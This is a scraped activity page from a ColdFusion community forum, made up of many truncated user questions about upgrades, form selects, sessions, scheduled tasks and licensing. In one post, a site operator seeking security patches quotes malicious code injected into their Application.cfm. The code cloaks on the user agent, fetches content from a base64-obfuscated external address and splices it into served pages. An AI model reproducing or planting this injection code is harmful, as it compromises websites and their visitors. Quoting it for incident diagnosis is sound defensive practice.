The official community for ColdFusion.
Actividad reciente
Recently upgraded from CF8 32bit and was using CFX_print to send ZPL code directly to a printer. Unfortunately 32bit DLLs do not load in 64-bit machines....Does anyone know or have an alternative to CFX_print that would run in 64 bits?
Currently i am reading data which is stored in .file in the format (abc|def|ghi|jkl|....|)using array and display the required data from the array as report data.Data is being appended to the .file every 20-39 mins. so the size of the .file is increasing which in turn makes the report to load slowly as it has to read the entire .file data everytime .Now i need an approach to store the data from .file into oracle database so that i can display the data from database inorder to lessen the time to load the data.any suggesstions pls ?
Yesterday some of our hosted sites were hacked using code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.Here's the hack:Application.cfm<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver"> <cfset mmy = cfhttp.FileContent><cfoutput>#mmy#</cfoutput></cfsavecontent> <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#"> <cfset cfs = cfhttp.FileContent><cfif (FindNoCase("</div>",paga) GT 0)><cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")><cfelseif (FindNoCase("</table>",paga) GT 0)><c
Why does this not return the variable form.item_cost to equal:199.99?<CFSET string1 = "Here we have $199.99 is the price"><CFSET form.item_cost = "#reMatchNoCase("^\d{0,4}(\.\d{1,2})?$",string1)#">I only want to match the first price it sees in the string and return that value as a numeric decimal.
I am trying to test the cfwebockets but i keep getting this error when i go to the webpage where i have the sample code. i have downloaded sample code from the adobe developers and it still gives me this error.I am using cF10 standard with websockets enabled on a win 2008 server 64bit. I am not getting any reaction from websockets as well. It won't subscribe or open connection. Any help?Here is the code i am using:<script> //messagehandler recieves all the messages from websocket function mycbHandler( messageobj) { var message = ColdFusion.JSON.encode(messageobj); var txt=document.getElementById("myDiv"); txt.innerHTML +=message +"<br>";
I have two URL's that I have changed in my code. Both are href tags in cfm pages. My problem is that when I view the page in a browser they are pointing to the wrong locations. Both URL's are external to my servers and require authintacaton. They temporarly redirect you to another page to login and then back to the requested page.Both URLs will work properly in a basic HTML page.Is there anywhere that CF will store old URLs?
Hi,i want to find the if the record from the list is matched with the record from the query but my code is not working. Can you please help? <cfset variables.subListItems = valuelist(variables.FindNocost.cost ,',') /> <cfset variables.FindSubNoCost = report_Nocost.getSubNoCost() /> <cfloop query="variables.FindSubNoCost"> #listFindNoCase(variables.subListItems ,item, ",")# </cfloop>Thanks
<cfselect name="MyList" id="MyList"> <cfoutput query="MySP"> <option value="#MySP.MyID#" <cfif (isDefined("form.MyID") AND form.MyID EQ MySP.MyID)>selected="selected"</cfif>>#MySP.MyCODE#</option> </cfoutput> </cfselect>I have above code and a cfseelct on the form.I use cfoutpit query to fill the option list.I would like to know does cfselect or standard slelect can fill option data using jQuery Ajax?Your help and information s great appreciated,Regards,Iccsi,
I have 5 select on the form and each one uses different data source from the query like following.I want to every one data limite by previous dropdown just like department, manager, supervisoe, leader and employees.If user select the first one department 1 then all the rest dropdown only shows department one managers, supervisors, leaders and employees.If user select one supervisors than only employee in hos or her group available for the users.I need pass client, previous value to the server and send back to client the rest of dropdown box.Any better way to handle this issue?Your help and information is great appreciated,Regards,Iccsi, <select name="MyList1" id="MyList1"> <cfoutput query="Myquery1"> <option value="#MyQuery1.MyID#">#MyQuery1.Mycode#</option> </cfoutput> </select><select name="MyList2" id="MyList2"> <cfoutput query="Myquery2"> <option value="#MyQuery2.MyID#">#MyQu
<cfselect> <option value="volvo">Volvo</option> <option value="saab">Saab</option> <option value="mercedes">Mercedes</option> <option value="audi">Audi</option></cfselect>I have above code on the form whihc has a cfselect on the form.I would like to let user add a new car if it does not exist in the list like 'BMW', 'Toyota'.The list does not let me enter new list does not exist.I would like to know are there any property to configure let user to enter a new list which does not exist.Your help and informaiton is great appreciated,Regards,Iccsi,
Dear Adobe Team,We are using adobe Photoshop CS5 in our HP Workstation machine, but since we changed our OS in windows 7 we are facing stroke problems.Like whenever we draw a straight stroke than it does not go straight it becomes curve type. Please find the below attached image of stroke.We are using cintiq Pen display & HP z420 workstation. So requesting you to kindly provide the solution ASAP
Howdy,Is there any place I can still purchase Coldfusion 9 standard still? I want to put together another server and I don't want to go through the entire code space and make changes again to go to coldfusion 10 right now, when i am currently running 9 and I just need to balance out the traffic peaks.Thanks.
I have a SELECT dropdown on the form and would like to have a function while user type then the dropdown will get the most close record for user to select.I tried to look on the internet, but no luck, It seems that CFSelect does not have this option.Any information is great appreciated,Regards,Iccsi,
After applying security patch APSB11-14 on 8.01 we are now seeing this error on every page that makes use of cfwindow. This is what the log file says: CFContainerID: Invalid input. Please conform to regex ^[\p{Alnum}_\-\.:]+$ with a maximum length of 100UPDATE: We found that the container name can't have a space. That stopped the error.This is what is in our cfwindow tag:<cfwindow center="true" closable="true" draggable="true" height="300" initShow="true" modal="false" name="Unavailable item" resizable="false" title="This item is no longer available" width="500"> text </cfwindow>
Hi,Quick question, are there any known issues with CF10 (update 11) and scheduled tasks? Today we had a dozen scheduled tasks, which run late in the night at completely different times, all run at once at 9am. The logs show CFSCHEDULE called the tasks from 127.0.0.1.Has anyone experienced something like that and is there any explanation?Thanks,Mark
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSc3ff6d0ea77859461172e0811cbec22c24-6d46.html
I got an error message when I connect to a MS SQL server with SSL connection.The error message is connection verification failed for data sourcejava.sql.SQLNonTransientConnectionexception:[Macromedia][SQLServer JDBC Driver]The SQL Server login requires SSL Conection.Any suggestions for this error message,Your help and information is great appreciated,Regards,Iccsi,
where do i find or obtain Adobe product end-of-life cycle support information - specificall Adobe Cold Fusion?
We have a CF application which is running fine locally under a v9 developer licence. We now need to transfer to a production server. We have bought a v10 enterprise licence which we were hoping to downgrade to 9 to avoid making any changes to the setup. v10 seems quite different. We have been told via the reseller that there is no way to downgrade the licence. Any suggestions?
Hi guys,am trying to open up a .exe file like notepad or whatever windows program with using <cfexecute> but seems it doesn't work at all. I'm able to write the command in cmd and run the exe file but when i put the command in cfexecute so i get nothing.here is the command i would like to run:"C:\Program Files (x86)\Vc\vc.exe" -e "\Crystal\BF_Faktura_D.rpt"altso, run/start a simple .exe windows program. I think there is something about security access from CF server or something like that.ANY HELP?
Hi Everyone!We have been having issues with session variables being dropped/changed. Basically what is happening is a user submits a web form and the session variable is changed. We also have problems on other pages where a user will enter their username and password, but once page navigates to the next page or even within the same page when a form is submitted, session variables gets reset. We noticed CFID and Token is different when we navigate or page gets refreshed. I have checked session management settings all over and don't think that's the problem. I have searched and found similar issues but none of the proposed fixes have seemed to work for us. I should also say this problem does not occur for every user. It seems intermittent which adds to the fun... Our pages all worked fine under Windows 2003 and CF8. We built new W2k8 servers with CF10, moved our files over and set up the new sites so it can’t be left over isapi connectors in IIS. Here is the problem in a nut
It appears that cfinput 'datefield' always aligns to left, I have tried everything I can think of to get it to align center (in the td, in a div, style in the input, etc) and it just wont align center, I even tried putting a bunch of in front of the input and it puts them on the right. Any Help would be appreciated.
My application needs to support dynamic THIS scope variables.As it stands, onApplicationStart, I load an XML config file, parse it, and it contains a structure which mimics the variable structure ColdFusion supports. Problem is, once I'm in the onApplicationStart() I've already passed the pseudo-constructor area where THIS-scoped variables are supposed to be set.In the onApplicationStart, I could not redirect to the same URL that was requested because I would never get to the <cfreturn true /> that is needed to start the application.Also, we use URL rewriting, so even though the URL may look like : http://sub.domain.tld/this/that, the actual page being called looks like: /sub/app/templates/request.cfm?path=/this/thatAnyways, in the pseudo-constructor, it checks if the application exists, and if so, iterates over a variable that holds this structure which holds the THIS-scope variables, and puts them into their respective places on subsequent page loads, but, as I understand
Hi,We recently moved an application from CF 7 to CF 10 and have since noticed that browsing to a non secure page (http) to a https page makes the server lose our log-in session. Our site has a log-in page, and this is served securely. When the user logs in they can access all other pages that securely link from that log-in page. But, as soon as they click on a non-secure page, the session is lost. This is a clean CF 10 install, not an upgrade. Are there any known issues with sessions and HTTPS in CF10 that we should be aware of? I printed out the session/cookie scopes on each page and it seems we get a new JSESSIONID for http/https sites, even though they have the same domain. Our cfapplication tag is defined as: cfapplication name="ourSite" clientmanagement="yes" sessionmanagement="yes" sessiontimeout="#CreateTimeSpan(0, 0, 20, 0)#" setclientcookies="yes" setdomaincookies="no" clientstorage="Cookie" scriptprotect="all"Can anyone please shed some light on this? The do
Hi Folks,Anyone know what number of graphics available in the cfgraph tag?Where I can find more information about this?[ ]'sFabiano Magno Pechibella
Remix with Firefly Community Gallery
Thousands of free creations to fall in love with and remix in Firefly.
¿Ya tiene cuenta? Iniciar sesión
¿Aún no tienes una cuenta? Crea una cuenta
Enter your E-mail address. We'll send you an e-mail with instructions to reset your password.